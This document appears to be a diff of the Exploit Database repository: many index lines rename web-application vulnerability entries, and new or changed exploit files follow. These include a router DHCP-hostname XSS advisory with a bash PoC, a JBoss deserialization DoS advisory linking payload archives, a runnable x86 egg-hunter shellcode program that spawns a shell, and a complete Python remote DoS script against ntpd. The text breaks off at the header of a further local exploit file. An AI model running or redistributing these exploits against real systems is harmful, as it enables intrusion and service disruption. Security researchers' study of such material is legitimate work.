 28267,platforms/php/webapps/28267.txt,"LinksCaffe 3.0 - links.php Multiple Parameter SQL Injection",2006-07-25,simo64,php,webapps,0
 28268,platforms/php/webapps/28268.txt,"LinksCaffe 3.0 - counter.php tablewidth Parameter Cross-Site Scripting",2006-07-25,simo64,php,webapps,0
@ -29586,7 +29599,7 @@ id,file,description,date,author,platform,type,port
 28371,platforms/php/webapps/28371.txt,"YaBBSE 1.x - 'index.php' Cross-Site Scripting",2006-08-10,O.U.T.L.A.W,php,webapps,0
 28372,platforms/php/webapps/28372.txt,"Tiny Web Gallery 1.5 - Image Parameter Multiple Remote File Inclusion",2006-08-10,x0r0n,php,webapps,0
 28377,platforms/php/webapps/28377.txt,"WordPress Plugin Complete Gallery Manager 3.3.3 - Arbitrary File Upload",2013-09-18,Vulnerability-Lab,php,webapps,0
-28378,platforms/php/webapps/28378.txt,"MyWebland miniBloggie 1.0 - Fname Remote File Inclusion",2006-08-10,sh3ll,php,webapps,0
+28378,platforms/php/webapps/28378.txt,"miniBloggie 1.0 - 'Fname' Remote File Inclusion",2006-08-10,sh3ll,php,webapps,0
 28379,platforms/php/webapps/28379.txt,"WEBinsta Mailing List Manager 1.3 - Install3.php Remote File Inclusion",2006-08-10,"Philipp Niedziela",php,webapps,0
 28382,platforms/php/webapps/28382.txt,"WordPress Plugin WP-DB Backup 1.6/1.7 - edit.php Directory Traversal",2006-08-14,"marc & shb",php,webapps,0
 28385,platforms/asp/webapps/28385.txt,"BlaBla 4U - Multiple Cross-Site Scripting Vulnerabilities",2006-08-14,Vampire,asp,webapps,0
@ -29619,10 +29632,10 @@ id,file,description,date,author,platform,type,port
 28429,platforms/php/webapps/28429.js,"MyBB 1.1.7 - Multiple HTML Injection Vulnerabilities",2006-08-26,Redworm,php,webapps,0
 28430,platforms/php/webapps/28430.txt,"Jupiter CMS 1.1.5 - 'index.php' Remote File Inclusion",2006-08-26,D3nGeR,php,webapps,0
 28431,platforms/php/webapps/28431.txt,"Jetbox CMS 2.1 - Search_function.php Remote File Inclusion",2006-08-26,D3nGeR,php,webapps,0
-28432,platforms/php/webapps/28432.txt,"BigACE 1.8.2 - item_main.php GLOBALS Parameter Remote File Inclusion",2006-08-26,Vampire,php,webapps,0
+28432,platforms/php/webapps/28432.txt,"BigACE 1.8.2 - 'item_main.php' Remote File Inclusion",2006-08-26,Vampire,php,webapps,0
-28433,platforms/php/webapps/28433.txt,"BigACE 1.8.2 - upload_form.php GLOBALS Parameter Remote File Inclusion",2006-08-26,Vampire,php,webapps,0
+28433,platforms/php/webapps/28433.txt,"BigACE 1.8.2 - 'upload_form.php' Remote File Inclusion",2006-08-26,Vampire,php,webapps,0
-28434,platforms/php/webapps/28434.txt,"BigACE 1.8.2 - download.cmd.php GLOBALS Parameter Remote File Inclusion",2006-08-26,Vampire,php,webapps,0
+28434,platforms/php/webapps/28434.txt,"BigACE 1.8.2 - 'download.cmd.php' Remote File Inclusion",2006-08-26,Vampire,php,webapps,0
-28435,platforms/php/webapps/28435.txt,"BigACE 1.8.2 - admin.cmd.php GLOBALS Parameter Remote File Inclusion",2006-08-26,Vampire,php,webapps,0
+28435,platforms/php/webapps/28435.txt,"BigACE 1.8.2 - 'admin.cmd.php' Remote File Inclusion",2006-08-26,Vampire,php,webapps,0
 28436,platforms/php/webapps/28436.txt,"Alstrasoft Video Share Enterprise 4.x - MyajaxPHP.php Remote File Inclusion",2006-08-26,night_warrior771,php,webapps,0
 28437,platforms/php/webapps/28437.txt,"Joomla! / Mambo Component 'com_comprofiler' 1.0 - 'class.php' Remote File Inclusion",2006-08-26,Matdhule,php,webapps,0
 28439,platforms/php/webapps/28439.txt,"HLstats 1.34 - hlstats.php Cross-Site Scripting",2006-08-29,kefka,php,webapps,0
@ -29934,7 +29947,7 @@ id,file,description,date,author,platform,type,port
 28831,platforms/php/webapps/28831.txt,"Simple Machines Forum (SMF) 1.0/1.1 - 'index.php' Cross-Site Scripting",2006-10-19,b0rizQ,php,webapps,0
 28832,platforms/php/webapps/28832.txt,"ATutor 1.5.3 - Multiple Remote File Inclusion",2006-10-19,SuBzErO,php,webapps,0
 28833,platforms/php/webapps/28833.pl,"Casinosoft Casino Script 3.2 - config.php SQL Injection",2006-10-20,G1UK,php,webapps,0
-28838,platforms/php/webapps/28838.txt,"ClanLite - Config-PHP.php Remote File Inclusion",2006-10-23,x_w0x,php,webapps,0
+28838,platforms/php/webapps/28838.txt,"ClanLite - 'conf-php.php' Remote File Inclusion",2006-10-23,x_w0x,php,webapps,0
 28839,platforms/php/webapps/28839.txt,"SchoolAlumni Portal 2.26 - smumdadotcom_ascyb_alumni/mod.php katalog Module query Parameter Cross-Site Scripting",2006-10-23,MP,php,webapps,0
 28840,platforms/php/webapps/28840.txt,"SchoolAlumni Portal 2.26 - mod.php mod Parameter Traversal Local File Inclusion",2006-10-23,MP,php,webapps,0
 28842,platforms/php/webapps/28842.txt,"Zwahlen's Online Shop 5.2.2 - Cat Parameter Cross-Site Scripting",2006-10-23,MC.Iglo,php,webapps,0
@ -30785,7 +30798,7 @@ id,file,description,date,author,platform,type,port
 29955,platforms/php/webapps/29955.txt,"WF-Quote 1.0 Xoops Module - 'index.php' SQL Injection",2007-05-07,Bulan,php,webapps,0
 29956,platforms/php/webapps/29956.txt,"ObieWebsite Mini Web Shop 2 - order_form.php PATH_INFO Parameter Cross-Site Scripting",2007-05-02,CorryL,php,webapps,0
 29957,platforms/php/webapps/29957.txt,"ObieWebsite Mini Web Shop 2 - Sendmail.php PATH_INFO Parameter Cross-Site Scripting",2007-05-02,CorryL,php,webapps,0
-29958,platforms/asp/webapps/29958.txt,"FipsCMS 2.1 - PID Parameter SQL Injection",2007-05-07,"ilker Kandemir",asp,webapps,0
+29958,platforms/asp/webapps/29958.txt,"FipsCMS 2.1 - 'pid' Parameter SQL Injection",2007-05-07,"ilker Kandemir",asp,webapps,0
 29959,platforms/hardware/webapps/29959.txt,"TVT TD-2308SS-B DVR - Directory Traversal",2013-12-01,"Cesar Neira",hardware,webapps,0
 29960,platforms/php/webapps/29960.txt,"TurnkeyWebTools SunShop Shopping Cart 4.0 - 'index.php' Multiple Parameter SQL Injection",2007-05-07,"John Martinelli",php,webapps,0
 29961,platforms/php/webapps/29961.txt,"TurnkeyWebTools SunShop Shopping Cart 4.0 - 'index.php' l Parameter Cross-Site Scripting",2007-05-07,"John Martinelli",php,webapps,0
@ -32079,8 +32092,8 @@ id,file,description,date,author,platform,type,port
 32096,platforms/php/webapps/32096.pl,"EasyE-Cards 3.10 - (SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities",2008-07-21,Dr.Crash,php,webapps,0
 32097,platforms/php/webapps/32097.txt,"XOOPS 2.0.18 - modules/system/admin.php fct Parameter Traversal Local File Inclusion",2008-07-21,Ciph3r,php,webapps,0
 32098,platforms/php/webapps/32098.txt,"XOOPS 2.0.18 - modules/system/admin.php fct Parameter Cross-Site Scripting",2008-07-21,Ciph3r,php,webapps,0
-32099,platforms/php/webapps/32099.txt,"RunCMS 1.6.1 - votepolls.php bbPath[path] Parameter Remote File Inclusion",2008-07-21,Ciph3r,php,webapps,0
+32099,platforms/php/webapps/32099.txt,"RunCMS 1.6.1 - 'bbPath[path]' Parameter Remote File Inclusion",2008-07-21,Ciph3r,php,webapps,0
-32100,platforms/php/webapps/32100.txt,"RunCMS 1.6.1 - config.php bbPath[root_theme] Parameter Remote File Inclusion",2008-07-21,Ciph3r,php,webapps,0
+32100,platforms/php/webapps/32100.txt,"RunCMS 1.6.1 - 'bbPath[root_theme]' Parameter Remote File Inclusion",2008-07-21,Ciph3r,php,webapps,0
 32101,platforms/php/webapps/32101.txt,"eSyndiCat 1.6 - 'admin_lng' Cookie Parameter Authentication Bypass",2008-07-21,Ciph3r,php,webapps,0
 32102,platforms/php/webapps/32102.txt,"AlphAdmin CMS 1.0.5_03 - 'aa_login' Cookie Parameter Authentication Bypass",2008-07-21,Ciph3r,php,webapps,0
 32106,platforms/php/webapps/32106.txt,"Claroline 1.8 - learnPath/calendar/myagenda.php Query String Cross-Site Scripting",2008-07-22,DSecRG,php,webapps,0
@ -32177,7 +32190,7 @@ id,file,description,date,author,platform,type,port
 32252,platforms/php/webapps/32252.txt,"Mambo Open Source 4.6.2 - administrator/popups/index3pop.php mosConfig_sitename Parameter Cross-Site Scripting",2008-08-15,"Khashayar Fereidani",php,webapps,0
 32253,platforms/php/webapps/32253.txt,"Mambo Open Source 4.6.2 - 'mambots/editors/mostlyce/' PHP/connector.php Query String Cross-Site Scripting",2008-08-15,"Khashayar Fereidani",php,webapps,0
 32254,platforms/php/webapps/32254.txt,"FlexCMS 2.5 - 'inc-core-admin-editor-previouscolorsjs.php' Cross-Site Scripting",2008-08-15,Dr.Crash,php,webapps,0
-32255,platforms/asp/webapps/32255.txt,"FipsCMS 2.1 - 'forum/neu.asp' SQL Injection",2008-08-15,U238,asp,webapps,0
+32255,platforms/asp/webapps/32255.txt,"FipsCMS 2.1 - 'neu.asp' SQL Injection",2008-08-15,U238,asp,webapps,0
 32257,platforms/php/webapps/32257.txt,"PromoProducts - 'view_product.php' Multiple SQL Injection",2008-08-15,baltazar,php,webapps,0
 32258,platforms/cgi/webapps/32258.txt,"AWStats 6.8 - 'AWStats.pl' Cross-Site Scripting",2008-08-18,"Morgan Todd",cgi,webapps,0
 32259,platforms/php/webapps/32259.txt,"Freeway 1.4.1.171 - english/account.php language Parameter Traversal Local File Inclusion",2008-08-18,"Digital Security Research Group",php,webapps,0
@ -33218,9 +33231,9 @@ id,file,description,date,author,platform,type,port
 34206,platforms/hardware/webapps/34206.txt,"D-Link AP 3200 - Multiple Vulnerabilities",2014-07-30,pws,hardware,webapps,80
 34207,platforms/php/webapps/34207.txt,"Customer Paradigm PageDirector - 'id' Parameter SQL Injection",2010-06-28,Tr0y-x,php,webapps,0
 34209,platforms/php/webapps/34209.txt,"BlaherTech Placeto CMS - 'Username' Parameter SQL Injection",2010-06-28,S.W.T,php,webapps,0
-34210,platforms/php/webapps/34210.txt,"OneCMS 2.6.1 - admin/admin.php cat Parameter Cross-Site Scripting",2010-06-24,"High-Tech Bridge SA",php,webapps,0
+34210,platforms/php/webapps/34210.txt,"OneCMS 2.6.1 - 'cat' Parameter Cross-Site Scripting",2010-06-24,"High-Tech Bridge SA",php,webapps,0
-34211,platforms/php/webapps/34211.html,"OneCMS 2.6.1 - search.php search Parameter SQL Injection",2010-06-24,"High-Tech Bridge SA",php,webapps,0
+34211,platforms/php/webapps/34211.html,"OneCMS 2.6.1 - 'search' Parameter SQL Injection",2010-06-24,"High-Tech Bridge SA",php,webapps,0
-34212,platforms/php/webapps/34212.html,"OneCMS 2.6.1 - admin/admin.php Short1 Parameter Cross-Site Scripting",2010-06-24,"High-Tech Bridge SA",php,webapps,0
+34212,platforms/php/webapps/34212.html,"OneCMS 2.6.1 - 'short1' Parameter Cross-Site Scripting",2010-06-24,"High-Tech Bridge SA",php,webapps,0
 34213,platforms/php/webapps/34213.txt,"PHP Bible Search - bible.php chapter Parameter SQL Injection",2010-06-29,"L0rd CrusAd3r",php,webapps,0
 34214,platforms/php/webapps/34214.txt,"PHP Bible Search - bible.php chapter Parameter Cross-Site Scripting",2010-06-29,"L0rd CrusAd3r",php,webapps,0
 34215,platforms/php/webapps/34215.txt,"MySpace Clone 2010 - SQL Injection / Cross-Site Scripting",2010-06-28,"L0rd CrusAd3r",php,webapps,0
@ -34117,7 +34130,7 @@ id,file,description,date,author,platform,type,port
 35615,platforms/php/webapps/35615.txt,"PhpAlbum.net 0.4.1-14_fix06 - 'var3' Parameter Remote Command Execution",2011-04-14,"High-Tech Bridge SA",php,webapps,0
 35616,platforms/php/webapps/35616.txt,"Agahi Advertisement CMS 4.0 - 'view_ad.php' SQL Injection",2011-04-15,"Sepehr Security Team",php,webapps,0
 35617,platforms/php/webapps/35617.txt,"Qianbo Enterprise Web Site Management System - 'Keyword' Parameter Cross-Site Scripting",2011-04-14,d3c0der,php,webapps,0
-35618,platforms/php/webapps/35618.txt,"RunCMS 'partners' Module - 'id' Parameter SQL Injection",2011-04-15,KedAns-Dz,php,webapps,0
+35618,platforms/php/webapps/35618.txt,"RunCMS Module Partners - 'id' Parameter SQL Injection",2011-04-15,KedAns-Dz,php,webapps,0
 35619,platforms/php/webapps/35619.txt,"PhoenixCMS 1.7 - Local File Inclusion / SQL Injection",2011-04-15,KedAns-Dz,php,webapps,0
 35621,platforms/php/webapps/35621.txt,"4Images 1.7.9 - Multiple Remote File Inclusions / SQL Injection",2011-04-16,KedAns-Dz,php,webapps,0
 35623,platforms/multiple/webapps/35623.txt,"Pimcore 3.0 / 2.3.0 CMS - SQL Injection",2014-12-27,Vulnerability-Lab,multiple,webapps,0
@ -34447,7 +34460,7 @@ id,file,description,date,author,platform,type,port
 36155,platforms/php/webapps/36155.php,"WeBid 1.1.1 - Unrestricted Arbitrary File Upload",2015-02-23,"CWH Underground",php,webapps,80
 36156,platforms/php/webapps/36156.txt,"Clipbucket 2.7 RC3 0.9 - Blind SQL Injection",2015-02-23,"CWH Underground",php,webapps,80
 36157,platforms/php/webapps/36157.rb,"Zabbix 2.0.5 - Cleartext ldap_bind_Password Password Disclosure (Metasploit)",2015-02-23,"Pablo González",php,webapps,80
-36159,platforms/php/webapps/36159.txt,"Zeuscart v.4 - Multiple Vulnerabilities",2015-02-23,"Steffen Rösemann",php,webapps,80
+36159,platforms/php/webapps/36159.txt,"Zeuscart 4.0 - Multiple Vulnerabilities",2015-02-23,"Steffen Rösemann",php,webapps,80
 36160,platforms/php/webapps/36160.txt,"phpBugTracker 1.6.0 - Multiple Vulnerabilities",2015-02-23,"Steffen Rösemann",php,webapps,80
 36161,platforms/php/webapps/36161.txt,"WordPress Plugin Easy Social Icons 1.2.2 - Cross-Site Request Forgery",2015-02-23,"Eric Flokstra",php,webapps,80
 36162,platforms/php/webapps/36162.txt,"TWiki 5.0.2 - bin/view/Main/Jump newtopic Parameter Cross-Site Scripting",2011-09-22,"Mesut Timur",php,webapps,0
@ -36199,7 +36212,7 @@ id,file,description,date,author,platform,type,port
 39117,platforms/php/webapps/39117.txt,"OpenX 2.8.x - Multiple Cross-Site Request Forgery Vulnerabilities",2014-03-15,"Mahmoud Ghorbanzadeh",php,webapps,0
 39118,platforms/php/webapps/39118.html,"osCMax 2.5 - Cross-Site Request Forgery",2014-03-17,"TUNISIAN CYBER",php,webapps,0
 39124,platforms/php/webapps/39124.txt,"MeiuPic 2.1.2 - 'ctl' Parameter Local File Inclusion",2014-03-10,Dr.3v1l,php,webapps,0
-39126,platforms/php/webapps/39126.txt,"BigACE Web CMS 2.7.5 - '/public/index.php' LANGUAGE Parameter Directory Traversal",2014-03-19,"Hossein Hezami",php,webapps,0
+39126,platforms/php/webapps/39126.txt,"BigACE 2.7.5 - 'LANGUAGE' Parameter Directory Traversal",2014-03-19,"Hossein Hezami",php,webapps,0
 39127,platforms/cgi/webapps/39127.txt,"innoEDIT - 'innoedit.cgi' Remote Command Execution",2014-03-21,"Felipe Andrian Peixoto",cgi,webapps,0
 39128,platforms/php/webapps/39128.txt,"Jorjweb - 'id' Parameter SQL Injection",2014-02-21,"Vulnerability Laboratory",php,webapps,0
 39129,platforms/php/webapps/39129.txt,"qEngine 4.1.6 / 6.0.0 - 'task.php' Local File Inclusion",2014-03-25,"Gjoko Krstic",php,webapps,0
@ -36817,3 +36830,5 @@ id,file,description,date,author,platform,type,port
 40809,platforms/php/webapps/40809.txt,"EasyPHP Devserver 16.1.1 - Cross-Site Request Forgery / Remote Command Execution",2016-11-22,hyp3rlinx,php,webapps,0
 40816,platforms/xml/webapps/40816.txt,"SAP NetWeaver AS JAVA - 'BC-BMT-BPM-DSK' XML External Entity Injection",2016-11-22,ERPScan,xml,webapps,0
 40826,platforms/php/webapps/40826.py,"Osticket 1.9.14 - 'X-Forwarded-For' Cross-Site Scripting",2016-11-24,"Joaquin Ramirez Martinez",php,webapps,0
 40837,platforms/hardware/webapps/40837.txt,"Tenda/Dlink/Tplink TD-W8961ND - 'DHCP' Cross-Site Scripting",2016-11-28,Vulnerability-Lab,hardware,webapps,0
 40842,platforms/java/webapps/40842.txt,"Red Hat JBoss EAP - Deserialization of Untrusted Data",2016-11-28,"Mediaservice.net Srl.",java,webapps,8080
--- a/platforms/android/remote/40846.html
+++ b/platforms/android/remote/40846.html
--- a/platforms/hardware/webapps/40837.txt
+++ b/platforms/hardware/webapps/40837.txt
@ -0,0 +1,157 @@
 Document Title:
 ===============
 Tenda, Dlink & Tplink TD-W8961ND - DHCP XSS Vulnerability
 References (Source):
 ====================
 https://www.vulnerability-lab.com/get_content.php?id=1990
 Release Date:
 =============
 2016-11-28
 Vulnerability Laboratory ID (VL-ID):
 ====================================
 1990
 Common Vulnerability Scoring System:
 ====================================
 3.5
 Abstract Advisory Information:
 ==============================
 The vulnerability laboratory research team discovered a persistent xss vulnerability in the Tenda, Dlink & Tplink 1.0.1 TD-W8961ND & ADSL2+ Modem Routers web-application.
 Vulnerability Disclosure Timeline:
 ==================================
 2016-11-28:	Public Disclosure (Vulnerability Laboratory)
 Discovery Status:
 =================
 Published
 Exploitation Technique:
 =======================
 Remote
 Severity Level:
 ===============
 Medium
 Technical Details & Description:
 ================================
 Persistent cross site scripting vulnerability has been discovered in Tenda 1.0.1 ADSL Modem Routers.
 The vulnerability allows remote attackers and local privileged account to inject malicious script codes 
 on the application-side to manipulate the router dhcp hostnames. 
 Attackers are able to inject malicious code into the current list of DHCP clients on view, by modifying 
 the DHCP hostname into valid xss payload. The execution of vulnerability occurs on the application-side 
 on view events. Due to our investigation, we discovered that all models with the firmware v1.x on the 
 web gui are affected by the security vulnerability. Remote attackers can for example make special crafted 
 malicious pages with POST method requests to manipulate the dhcp hostname listing and client view.
 The security risk of the issue is estimated as medium with a cvss (common vulnerability scoring system) count of 3.5. 
 Exploitation of the vulnerability requires no privilege web-application user account and only low user interaction. 
 Successful exploitation of the vulnerability results in phishing attacks, session hijacking, persistent external redirect 
 to malicious sources and persistent manipulation of affected or connected web module context.
 Request Method(s):
 [+] POST
 Vulnerable Module(s):
 [+] DHCP Client List 
 [+] DHCP settings
 Vulnerable Parameter(s):
 [+] Hostnames
 Proof of Concept (PoC):
 =======================
 Persistent vulnerability can be exploited by remote attackers with low privileged application user account and low user interaction.
 For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.
 Manaul steps to reproduce the vulnerability ... (local)
 1. Open the Router UI
 2. Login as basic account
 3. Open the DHCP List module via settings
 4. Inject a payload to the hostnames input field
 5. Save the input
 6. Now the list becomes visible with all clients and the payload executes within the context
 7. Successful reproduce of the vulnerability!
 The following code is a bash script working on supported Linux OS to change the name of DHCP hostnames to a xss payload. 
 Save the file into vulnerablity.sh, then chmod +x vulnerability.sh.
 PoC: Exploit
 #!/bin/bash
 GREEN=$(tput setaf 2 && tput bold)
 BLUE=$(tput setaf 6 && tput bold) 
 echo $BLUE"[+] Persistent XSS DHCP Exploiter via Routers"
 echo $GREEN"[+] Vulnerability founded by : Lawrence Amer " 
 echo -n $BLUE"[~] type XSS Payload here :"
 read -e xss 
 echo $xss > /etc/hostname
 echo $GREEN"[+]DHCP HOST NAME IS WRITTEN"
 Video: https://www.youtube.com/watch?v=HUM5myJWbvc
 Solution - Fix & Patch:
 =======================
 The xss vulnerability can be patched by a secure parse of the hostnames client parameters.
 Restrict the input and disallow the usage of special chars to prevent the injection point.
 Parse as well the hostnames output location in the active dhcp clients list.
 Security Risk:
 ==============
 The security risk of the persistent xss web vulnerability in the router web-application is estimate as medium. (CVSS 3.5)
 Credits & Authors:
 ==================
 Vulnerability Laboratory [Research Team] - Lawrence Amer (https://www.vulnerability-lab.com/show.php?user=Lawrence%20Amer)
 Disclaimer & Information:
 =========================
 The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed 
 or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable 
 in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab 
 or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability mainly for 
 consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any licenses, policies, 
 deface websites, hack into databases or trade with stolen data.
 Domains:    www.vulnerability-lab.com 		- www.vuln-lab.com 						- www.evolution-sec.com
 Section:    magazine.vulnerability-lab.com 	- vulnerability-lab.com/contact.php 				- evolution-sec.com/contact
 Social:	    twitter.com/vuln_lab		- facebook.com/VulnerabilityLab 				- youtube.com/user/vulnerability0lab
 Feeds:	    vulnerability-lab.com/rss/rss.php 	- vulnerability-lab.com/rss/rss_upcoming.php 			- vulnerability-lab.com/rss/rss_news.php
 Programs:   vulnerability-lab.com/submit.php 	- vulnerability-lab.com/list-of-bug-bounty-programs.php 	- vulnerability-lab.com/register.php
 Any modified copy or reproduction, including partially usages, of this file, resources or information requires authorization from Vulnerability Laboratory. 
 Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by 
 Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark 
 of vulnerability-lab team & the specific authors or managers. To record, list, modify, use or edit our material contact (admin@) to get a ask permission.
 				    Copyright © 2016 | Vulnerability Laboratory - [Evolution Security GmbH]™
 -- 
 VULNERABILITY LABORATORY - RESEARCH TEAM
 SERVICE: www.vulnerability-lab.com
--- a/platforms/java/webapps/40842.txt
+++ b/platforms/java/webapps/40842.txt
@ -0,0 +1,77 @@
 Security Advisory           @ Mediaservice.net Srl
 (#05, 23/11/2016)           Data Security Division
         Title:	Red Hat JBoss EAP deserialization of untrusted data 
   Application:	JBoss EAP 5.2.X and prior versions
   Description:	The application server deserializes untrusted data via the
                JMX Invoker Servlet. This can lead to a DoS via resource
                exhaustion and potentially remote code execution.
        Author: Federico Dotta <federico.dotta@mediaservice.net>
                Maurizio Agazzini <inode@mediaservice.net>
 Vendor Status: Will not fix
 CVE Candidate: The Common Vulnerabilities and Exposures project has assigned
                the name CVE-2016-7065 to this issue.     
    References: http://lab.mediaservice.net/advisory/2016-05-jboss.txt
                http://lab.mediaservice.net/code/jboss_payload.zip
                https://bugzilla.redhat.com/show_bug.cgi?id=1382534
 1. Abstract.
 JBoss EAP's JMX Invoker Servlet is exposed by default on port 8080/TCP. The
 communication employs serialized Java objects, encapsulated in HTTP
 requests and responses.
 The server deserializes these objects without checking the object type. This 
 behavior can be exploited to cause a denial of service and potentially 
 execute arbitrary code.
 The objects that can cause the DoS are based on known disclosed payloads
 taken from:
 - https://gist.github.com/coekie/a27cc406fc9f3dc7a70d
 Currently there is no known chain that allows code execution on JBoss EAP,
 however new chains are discovered every day.
 2. Example Attack Session.
 Submit an authenticated POST request to the JMX Invoker Servlet URL (for 
 example: http://localhost:8080/invoker/JMXInvokerServlet) with one of the 
 following objects in the body of the request:
    * 01_BigString_limited.ser: it's a string object; the server will
      reply in a normal way (object size similar to the next one).
    * 02_SerialDOS_limited.ser: the application server will require
      about 2 minutes to execute the request with 100% CPU usage.
    * 03_BigString.ser: it's a string object; the server will
      reply in a normal way (object size similar to the next one).
    * 04_SerialDOS.ser: the application server will require an 
      unknown amount of time to execute the request with 100% CPU usage.
 3. Affected Platforms.
 This vulnerability affects versions 4 and 5 of JBoss EAP.
 4. Fix.
 Red Hat will not fix the issue because JBoss EAP 4 is out of maintenance 
 support and JBoss EAP 5 is close to the end of its maintenance period. 
 5. Proof Of Concept.
 See jboss_payload.zip (40842.zip) and Example Attack Session above.
 http://lab.mediaservice.net/code/jboss_payload.zip
 https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40842.zip
 6. Timeline
 06/10/2016 - First communication sent to Red Hat Security Response Team
 07/10/2016 - Red Hat Security Response Team response, Bug 1382534 
 23/11/2016 - Security Advisory released
 Copyright (c) 2016 @ Mediaservice.net Srl. All rights reserved.
 Proof of Concept:
 https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40842.zip
--- a/platforms/lin_x86/shellcode/40827.c
+++ b/platforms/lin_x86/shellcode/40827.c
@ -1,45 +1,60 @@
 /*
-;author: Filippo "zinzloun" Bersani
+;author:	Filippo "zinzloun" Bersani
-;date: 25/11/2016
+;date: 		28/11/2016
-;version 1.0
+;version:	1.0
 ;purpose: different approach with fnstenv technique, changed the usual pattern to find the egg mark
 ;X86 Assembly/NASM Syntax
-;tested on:	Linux OpenSuse001 2.6.34-12-desktop 32bit
+;tested on: Linux OpenSuse001 2.6.34-12-desktop 32bit
-;			Linux ubuntu 3.13.0-100-generic #147~precise1-Ubuntu 32bit
+;           Linux ubuntu 3.13.0-100-generic #147~precise1-Ubuntu 32bit
 ;			Linux bb32 4.4.0-45-generic 32bit
 ; description
 ;	egg hunter shellcode: different approach to the classic jpc technique using fstenv and dynamic memory location
 ;	plus a bit of obfuscation to generate the egg mark
 ; POC
 ;	execute a shell
 ; see comment for details
 global _start
 section .text
 _start:
- fldz                           ;with this 2 instructions...
+fldpi						
- fnstenv [esp-0xc]              ;set the entry point of my egg (_start)
+fstenv [esp-0xc]			;fstenv getpc: the entry mem addr of this code (_start)
 pop esi						;pop it in esi
 xor eax,eax					
 mov al, 0x1f				;set the offset bytes to point at the end of the program
 add esi, eax				;set the mem addr dinamically
- pop esi                        ;get the entry point addr...
+set_mark:
- lea esi,[esi+24]               ;the trick: move to pointer @ the last byte of this egg hunter
+ mov edx, dword 0x65676760	;a dumm value..
-
+ rol edx, 0x4 				;get the real mark: 56767606
 mov edx, dword 0x65676760      ;a dumm value..
 rol edx, 0x4                   ;...to get the real egg mark: 56767606
 find_egg:
- inc esi        				;scan the next section of memory after this code
+ add esi,4 					;scan the next section of mem, since we are in 32 arch we need to add 4 bytes
- cmp [esi], edx 				;check if we have found the egg...
+ cmp[esi], edx 				;check if we have found the egg...
- jz find_egg    				;loop
+ jz find_egg  				;loop
- call esi       				;egg found (zero flag is set), jump to the address to exec the shell code
+ call esi    				;found our egg (zero flag is set), jump to the execution of the shellcode
- */
+*/
- 
+
 #include<stdio.h>
 #include<string.h>
 unsigned char egg_hunter[] = \
-"\xd9\xee\xd9\x74\x24\xf4\x5e\x8d\x76\x18\xba\x60\x67\x67\x65\xc1\xc2\x04\x46\x39\x16\x74\xfb\xff\xd6";
+"\xd9\xeb\x9b\xd9\x74\x24\xf4\x5e\x31\xc0\xb0\x1f\x01\xc6\xba\x60\x67\x67\x65\xc1\xc2\x04\x83\xc6\x04\x39\x16\x74\xf9\xff\xd6"; //the actual egg hunter code
 unsigned char shell_code[] = \
 "\x31\xc0\xb0\x05\xfe\xc0\xfe\xc8\xb0\x06\x90" //dumm instructions
 "\x06\x76\x76\x56" // egg id reversed
-"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x89\xc1\x89\xc2\xb0\x0b\xcd\x80\x31\xc0\x40\xcd\x80"; // POC: /bin/bash
+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x89\xc1\x89\xc2\xb0\x0b\xcd\x80\x31\xc0\x40\xcd\x80"; // /bin/bash
 main()
 {
        printf("Egg hunter length:  %d\n", strlen(egg_hunter));
-        printf("Total length: %d\n", strlen(egg_hunter)+strlen(shell_code));
+	printf("Total length: %d\n", strlen(egg_hunter)+strlen(shell_code));
        int (*ret)() = (int(*)())egg_hunter;
        ret();
-}
+}
--- a/platforms/linux/dos/40840.py
+++ b/platforms/linux/dos/40840.py
@ -0,0 +1,26 @@
 #!/usr/bin/env python
 # Exploit Title: ntpd 4.2.8p3 remote DoS
 # Date: 2015-10-21
 # Bug Discovery: John D "Doug" Birdwell
 # Exploit Author: Magnus Klaaborg Stubman (@magnusstubman)
 # Website: http://support.ntp.org/bin/view/Main/NtpBug2922
 # Vendor Homepage: http://www.ntp.org/
 # Software Link: https://www.eecis.udel.edu/~ntp/ntp_spool/ntp4/ntp-4.2/ntp-4.2.8p3.tar.gz
 # Version: All ntp-4 releases up to, but not including 4.2.8p4, and 4.3.0 up to, but not including 4.3.77
 # CVE: CVE-2015-7855
 import sys
 import socket
 if len(sys.argv) != 3:
    print "usage: " + sys.argv[0] + " <host> <port>"
    sys.exit(-1)
 payload = "\x16\x0a\x00\x02\x00\x00\x00\x00\x00\x00\x00\xa0\x6e\x6f\x6e\x63\x65\x3d\x64\x61\x33\x64\x35\x64\x30\x66\x66\x38\x30\x38\x31\x65\x63\x38\x33\x35\x32\x61\x32\x32\x38\x36\x2c\x20\x66\x72\x61\x67\x73\x3d\x33\x32\x2c\x20\x6c\x61\x64\x64\x72\x3d\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39"
 print "[-] Sending payload to " + sys.argv[1] + ":" + sys.argv[2] + " ..."
 sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
 sock.sendto(payload, (sys.argv[1], int(sys.argv[2])))
 print "[+] Done!"
--- a/platforms/linux/local/40838.c
+++ b/platforms/linux/local/40838.c
@ -0,0 +1,72 @@
